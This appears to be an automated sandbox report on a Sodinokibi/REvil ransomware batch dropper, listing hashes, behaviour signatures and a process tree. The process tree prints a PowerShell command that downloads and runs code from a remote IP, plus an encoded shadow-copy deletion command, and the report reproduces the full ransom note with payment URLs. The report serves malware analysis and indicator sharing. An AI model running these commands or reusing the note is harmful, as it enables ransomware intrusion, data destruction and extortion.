Analysis

  • max time kernel
    136s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    07-08-2020 13:10

General

  • Target

    5356d4234ccf138172e7820bde48cb1d.bat

  • Size

    219B

  • MD5

    7ead0a1f8df272b28f265e05b4f23088

  • SHA1

    07c838862750645da66de62f19d4ac32d852da99

  • SHA256

    e4133ab28a0c8965753d56a55beff0bdf47d6bb7d711d708f36f7fe985085a21

  • SHA512

    b9f721731cfdb058f37dbfc3e42eb519485916eba77b8f1cc3b8f0a1bd7facded50dcf3a2bb6ed87b749f7f01199962061a3005d179184fafdeeef6dfcb3c1b9

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/5356d4234ccf138172e7820bde48cb1d

Extracted

Path

C:\gst2it-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension gst2it. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A632771ABD9B4A1B 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A632771ABD9B4A1B Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 9el/1un/v46ZjkxXuR1WLpfEDux62gX2CXSVMnxbiGcCjQmvG/rQChpGDHWl6ghx 1+WB2l8r5uchzIIYWOD/TXTSwytugi+haQ/YdJFUC7pF89S4qZ7LCAMcYFQq9SsF b/wuRx1DiwbdaEM/kfSViD/AzyU+x+AA4/diZytQQizo4toDLAWbtKiIvJ2VY4Nh 2zqbKEIbbX4PCBHOjrvnRcR2/2WvBBOqe0BeZFHvltUGstniE/PyryXOL+P5RZAl Qpc7TobYzTNp+YdRa4Rb7M92XMul9NSvIJqhg8NGKlLrxirY1QZnzpMgp0RTlzS6 IFZyvE5O+Hp5PZzABdrsQWnhaG+SrVo+L+X2XAQnHr9YRTsOUT80ltOV1XJFoHSp QcWE4H7pAzemJKR+1fO8tW2hY96V5Y9n+D0ze91qOucG+DkD5DOhqlpb604CBgM0 VLJqxUdFZvt5yS9nesgYnenCVevtGDdVDXJgzQ2azQ6u8wZV/56jweUXo2ZlAMGw Vr4hSAK0YzAfqRdeSypfJFlHoKGSjfz1Xk5yUUG3KvlSmDr4B51Gkxsa5bwlABP4 irz/YDxRXzHdA8FsFMEBxsrYqWD95ecrG1FVBNb8yqMOm14tIYCia4NkGNn3AKZ/ d05frYz9g3DgHb9zRliFwEZp2+Mn1+7JlwO4MSRaMKQdwt7H+cmjvgz27TA0k8SA mGeHHCeJoApJXE/KX3ZxVxH+DvRHqkgRcrHjK4x6QnZH2bwz8u5TOsJGhG3c1Zjp QlExi6j1egzYwod9pHQgH6p/rdC3h2OcoOhnAXgI5BW3FPOBqrD3USUG9Yz1nGoQ PgBRldp9O9YTA61Z16cZcKIhJqUaDnYL3MNYGkqILqrZaiuzNsbjnFobcAXfRKtM zjUKtst56jxK/DZZhwxZssHSYArQJ8BwmXlkhz6tvcB89gQ+diwxfPuIGVhXdudz 4ZB0wQDqErGT05ukf/TgVFG8r6I8VdkJ9QIvaN8od2nLi+A3VJLsmK4UBt5v4yVM aNyHv++qr1bSbRgcSkomiqRpE2GWTBf5TJdXrDPMgLZSH/gk7Bf1WmZVEdShDF/O YgFZ3IUQU+8XCCnByR7Pol9PeRpGDyRhevazpbHndEGFMofDZ7h53BD3V0yxa5RD ir7JL14BWp9TvUq12BFtgwk00lKRmlW2/2JhEcM0BeKAIOM8RUnWj4n5Jdww4trN +3NO4k06y7eGKnZ8mG9ZBuErSVZH+XfobnTJ93gh+jObUa9Q2cY8W8KaR0Hfx5jD Xce4gNo4qgo+PIYOb9HGObec6tbI+SMHNEfu0Zuq898= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A632771ABD9B4A1B

http://decryptor.cc/A632771ABD9B4A1B

Signatures

  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies service 2 TTPs 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 92 IoCs
  • Enumerates connected drives 3 TTPs
  • Drops file in Program Files directory 30 IoCs
  • Modifies extensions of user files 15 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\5356d4234ccf138172e7820bde48cb1d.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1460
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/5356d4234ccf138172e7820bde48cb1d');Invoke-XIBCXTXJVNEI;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Drops file in System32 directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      PID:1608
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1872
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1580

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1608-5-0x0000000001310000-0x0000000001311000-memory.dmp

    Filesize

    4KB

  • memory/1608-21-0x0000000006290000-0x0000000006291000-memory.dmp

    Filesize

    4KB

  • memory/1608-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

  • memory/1608-14-0x0000000006150000-0x0000000006151000-memory.dmp

    Filesize

    4KB

  • memory/1608-13-0x0000000006080000-0x0000000006081000-memory.dmp

    Filesize

    4KB

  • memory/1608-8-0x0000000005FD0000-0x0000000005FD1000-memory.dmp

    Filesize

    4KB

  • memory/1608-0-0x0000000000000000-mapping.dmp

  • memory/1608-4-0x0000000001110000-0x0000000001111000-memory.dmp

    Filesize

    4KB

  • memory/1608-3-0x0000000004A20000-0x0000000004A21000-memory.dmp

    Filesize

    4KB

  • memory/1608-2-0x00000000009B0000-0x00000000009B1000-memory.dmp

    Filesize

    4KB

  • memory/1608-1-0x00000000738C0000-0x0000000073FAE000-memory.dmp

    Filesize

    6.9MB

  • memory/1872-23-0x0000000000000000-mapping.dmp

  • memory/1872-25-0x00000000738C0000-0x0000000073FAE000-memory.dmp

    Filesize

    6.9MB